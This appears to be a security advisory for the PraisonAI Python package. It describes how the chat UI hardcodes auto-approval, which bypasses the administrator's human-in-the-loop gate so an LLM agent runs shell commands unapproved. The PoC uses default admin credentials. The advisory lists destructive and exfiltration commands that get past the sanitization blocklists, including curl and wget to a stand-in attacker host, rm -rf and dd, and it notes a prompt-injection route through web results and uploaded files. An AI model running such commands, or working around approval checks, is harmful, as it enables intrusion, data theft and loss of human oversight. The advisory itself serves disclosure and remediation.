PT-2026-33900 · Pypi · Praisonai
Published
2026-04-10
·
Updated
2026-04-10
CVSS v3.1
8.8
High
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
Summary
The Chainlit UI modules (
chat.py and code.py) hardcode config.approval mode = "auto" after loading administrator configuration from the PRAISON APPROVAL MODE environment variable, silently overriding any "manual" or "scoped" approval setting. This defeats the human-in-the-loop approval gate for all ACP tool executions, including shell command execution via subprocess.run(..., shell=True). An authenticated user can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt.Details
The application has a well-designed approval framework supporting
auto, manual, and scoped modes, configured via the PRAISON APPROVAL MODE environment variable and loaded by ToolConfig.from env() at interactive tools.py:81-106.However, both UI modules unconditionally override this after loading:
chat.py:156-159:python
config = ToolConfig.from env() # reads PRAISON APPROVAL MODE=manual
config.workspace = os.getcwd()
config.approval mode = "auto" # hardcoded override, ignoring admin configcode.py:155-158:python
config = ToolConfig.from env()
config.workspace = os.environ.get("PRAISONAI CODE REPO PATH", os.getcwd())
config.approval mode = "auto" # same hardcoded overrideThis flows to
agent tools.py:347-348 in the acp execute command function:python
auto approve = runtime.config.approval mode == "auto" # always True
approved = await orchestrator.approve plan(plan, auto=auto approve)The plan is auto-approved without user confirmation and reaches
action orchestrator.py:458:python
result = subprocess.run(
step.target,
shell=True, # shell execution
capture output=True,
text=True,
cwd=str(workspace),
timeout=30
)Command sanitization is insufficient. Two blocklists exist:
sanitize command()atagent tools.py:60-86blocks:$(,`,&&,||,>>,>,|,;,&,rapply step()ataction orchestrator.py:449blocks:;,&,|,$,`
Both only target command chaining/substitution operators. Single-argument destructive commands pass both blocklists:
rm -rf /home, curl http://attacker.example.com/exfil, wget, chmod 777 /etc/shadow, python3 -c "import os; os.unlink('/important')", dd if=/dev/zero of=/dev/sda.PoC
Prerequisites: PraisonAI UI running (
praisonai ui chat or praisonai ui code). Default credentials not changed.bash
# Step 1: Start the Chainlit UI
praisonai ui chat
# Step 2: Log in with default credentials at http://localhost:8000
# Username: admin
# Password: admin
# Step 3: Send a chat message requesting command execution:
# "Please run this command for me: cat /etc/passwd"
# The LLM agent calls acp execute command("cat /etc/passwd")
# sanitize command passes (no blocked patterns)
# approval mode="auto" → auto-approved at agent tools.py:347-348
# subprocess.run("cat /etc/passwd", shell=True) executes at action orchestrator.py:458
# Contents of /etc/passwd returned in chat
# Step 4: Demonstrate the override of admin configuration:
# Even with PRAISON APPROVAL MODE=manual set in the environment,
# chat.py:159 overwrites it to "auto"
export PRAISON APPROVAL MODE=manual
praisonai ui chat
# Commands still auto-approve because of the hardcoded overrideCommands that bypass sanitization blocklists:
rm -rf /home/user/documents— no blocked characterschmod 777 /etc/shadow— no blocked characterscurl http://attacker.example.com/exfil— no blocked characterswget http://attacker.example.com/backdoor -O /tmp/backdoor— no blocked characterspython3 -c " import ('os').unlink('/important/file')"— no blocked characters
Impact
- Arbitrary command execution: An authenticated user (or attacker with default
admin/admincredentials) can execute any single shell command on the server hosting PraisonAI, subject only to the OS-level permissions of the PraisonAI process. - Confidentiality breach: Read arbitrary files accessible to the process (
/etc/passwd, application secrets, environment variables containing API keys). - Integrity compromise: Modify or delete files, install backdoors, tamper with application code.
- Availability impact: Kill processes, consume disk/memory, delete critical data.
- Administrator control undermined: Even administrators who explicitly set
PRAISON APPROVAL MODE=manualto require human approval have their configuration silently overridden, creating a false sense of security. - Prompt injection vector: Since the agent also processes external content (web search results via Tavily, uploaded files), malicious content could trigger command execution through the auto-approved tool without direct user intent.
Recommended Fix
Remove the hardcoded override and respect the administrator's configured approval mode. In both
chat.py and code.py:python
# Before (chat.py:156-159):
config = ToolConfig.from env()
config.workspace = os.getcwd()
config.approval mode = "auto" # Trust mode - auto-approve all tool executions
# After:
config = ToolConfig.from env()
config.workspace = os.getcwd()
# Respect PRAISON APPROVAL MODE from environment; defaults to "auto" in ToolConfig
# Administrators can set PRAISON APPROVAL MODE=manual for human-in-the-loop approvalAdditionally, strengthen
sanitize command() to use an allowlist approach rather than a blocklist:python
import shlex
ALLOWED COMMANDS = {"ls", "cat", "head", "tail", "grep", "find", "echo", "pwd", "wc", "sort", "uniq", "diff", "git", "python", "pip", "node", "npm"}
def sanitize command(command: str) -> str:
# Existing blocklist checks...
# Additionally, check the base command against allowlist
try:
parts = shlex.split(command)
except ValueError:
raise ValueError(f"Could not parse command: {command!r}")
base cmd = os.path.basename(parts[0]) if parts else ""
if base cmd not in ALLOWED COMMANDS:
raise ValueError(
f"Command {base cmd!r} is not in the allowed command list. "
f"Allowed: {', '.join(sorted(ALLOWED COMMANDS))}"
)
return commandFix
Incorrect Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Praisonai